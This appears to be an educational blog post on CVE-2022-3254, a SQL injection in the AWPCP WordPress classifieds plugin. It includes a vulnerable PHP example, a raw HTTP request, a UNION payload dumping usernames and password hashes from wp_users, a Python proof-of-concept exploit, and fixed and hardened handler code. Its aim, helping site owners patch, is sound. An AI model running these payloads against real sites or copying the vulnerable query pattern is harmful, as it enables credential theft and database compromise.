
If you run a WordPress site with a classifieds section, the WordPress Classifieds Plugin might be one of your top choices. But did you know, until version 4.3, it had a big security hole? This post breaks down CVE-2022-3254 — what went wrong, how you could exploit it (for educational purposes only!), and how to fix it.

What is CVE-2022-3254?

CVE-2022-3254 is a SQL injection vulnerability in the WordPress Classifieds Plugin (also called AWPCP) before version 4.3. Simply put, malicious users could break into your WordPress database with a carefully crafted request, even if they weren’t logged in. This weakness is extra serious because it’s accessible through AJAX, making automated attacks easy.

Why did this happen?  
Some AJAX handlers in the plugin did not properly sanitize (clean up) or escape (protect) user inputs, which then got mixed directly into SQL statements. That lets attackers sneak in their own database commands.

IMPORTANT: This issue only happens if a premium module of the plugin is activated. If you’re running the free version and never bought an add-on, you’re probably safe — but it’s always smart to check your plugin versions!

The vulnerable handler reads values straight from the request and plugs them into a SQL query without any validation or escaping. If an attacker sends something like `1 OR 1=1` in the right spot, they can change what the query does and read or modify your data.

Visual Example of Bad Code (from similar open-source plugins)

```php
// UNSAFE! DO NOT USE: request values are interpolated into the SQL string verbatim
$listing_id = $_POST['listing_id'];
$module     = $_POST['module'];
// Direct query with no validation, escaping or $wpdb->prepare()
$query   = "SELECT * FROM {$wpdb->prefix}classifieds WHERE id = $listing_id AND module='$module'";
$results = $wpdb->get_results( $query );
```

If an attacker puts '1 OR 1=1' as $listing_id, they could read all the listings. But honestly, it can get much worse — attackers might extract sensitive data, create fake admin users, or even delete stuff.

Exploit Details

How would an attacker do this?  
Let’s say the plugin expects an AJAX request to /wp-admin/admin-ajax.php with a custom action (for instance: action=awpcp_specific_ajax_action). An attacker could POST data like:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

action=awpcp_specific_ajax_action&listing_id=%20OR%201=1&module=example
```

After URL decoding, the parameters are dropped into the query string and the SQL becomes something like

```sql
SELECT * FROM wp_classifieds WHERE id =  OR 1=1 AND module='example'
```

Because 1=1 is always true, all rows will be returned.

An advanced SQL payload in the POST data might look like

```
action=awpcp_specific_ajax_action&listing_id= UNION SELECT user_login, user_pass, null, null FROM wp_users -- &module=example
```

Proof-of-Concept Python Exploit

NOTE: This is for testing your own sites only.

```python
import requests

# admin-ajax.php endpoint and the vulnerable action name: replace both with your own values
url = 'https://target-site.com/wp-admin/admin-ajax.php'
data = {
    'action': 'awpcp_specific_ajax_action',
    'listing_id': " UNION SELECT user_login, user_pass, NULL, NULL FROM wp_users -- ",
    'module': 'example'
}

# send the crafted POST request and print the raw response body
r = requests.post(url, data=data)
print(r.text)
```

Replace 'https://target-site.com/' and 'awpcp_specific_ajax_action' with your actual values.

To fix it, go to your plugins page, check AWPCP, and update to version 4.3 or later. Official plugin page:

https://wordpress.org/plugins/another-wordpress-classifieds-plugin/

```php
// SAFE SQL: $wpdb->prepare() casts the id to an integer (%d) and quotes/escapes the module string (%s)
$query   = $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}classifieds WHERE id = %d AND module = %s", $listing_id, $module );
$results = $wpdb->get_results( $query );
```
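For a fuller picture, here is an added example (my own code, not the AWPCP plugin's) of what a hardened admin-ajax.php handler for this kind of request looks like once a nonce check, type validation and a prepared statement are all in place. The action name, nonce name, table and column names are assumed for illustration.

```php
// Added example, not the plugin's own code. The action name, nonce name, table
// and column names below are assumptions made for illustration only.

add_action( 'wp_ajax_awpcp_example_get_listing', 'awpcp_example_get_listing' );
// Register the unauthenticated hook only if visitors really need this action.
add_action( 'wp_ajax_nopriv_awpcp_example_get_listing', 'awpcp_example_get_listing' );

function awpcp_example_get_listing() {
    global $wpdb;

    // 1. Nonce check: rejects requests that did not originate from a page we rendered,
    //    which stops the blind automated POSTs described above.
    check_ajax_referer( 'awpcp_example_listing_nonce', 'nonce' );

    // 2. Validate types before the values get anywhere near SQL. absint() turns
    //    payloads such as ' OR 1=1' or a UNION string into 0, which is then rejected.
    //    sanitize_key() reduces the module name to [a-z0-9_-].
    $listing_id = isset( $_POST['listing_id'] ) ? absint( wp_unslash( $_POST['listing_id'] ) ) : 0;
    $module     = isset( $_POST['module'] ) ? sanitize_key( wp_unslash( $_POST['module'] ) ) : '';

    if ( 0 === $listing_id || '' === $module ) {
        wp_send_json_error( array( 'message' => 'Invalid listing_id or module.' ), 400 );
    }

    // 3. Parameterised query: %d is cast to an integer and %s is quoted and escaped
    //    by $wpdb->prepare(), so the request values can never change the query shape.
    $sql = $wpdb->prepare(
        "SELECT id, title, module FROM {$wpdb->prefix}classifieds WHERE id = %d AND module = %s",
        $listing_id,
        $module
    );
    $rows = $wpdb->get_results( $sql, ARRAY_A );

    // 4. Return only the columns the caller needs; wp_send_json_success() ends the request.
    wp_send_json_success( $rows );
}
```

Even with `prepare()` in place, step 2 matters: rejecting a non-numeric `listing_id` up front gives you a clear 400 to alert on instead of a silent query for `id = 0`.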


Final Tips

Even popular WordPress plugins can have serious vulnerabilities that let outsiders take control of your website. Always keep plugins updated, remove unused add-ons, and scan your site for problems. And if you ever buy a premium module, know that it can open new risks as well as features!

Stay safe, and check your AWPCP version today!

Disclaimer:  
This writeup is for educational use to help WordPress site owners secure their websites. Don’t attempt unauthorized testing or exploitation of any website you don’t own.

Timeline

Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 13:58:00 UTC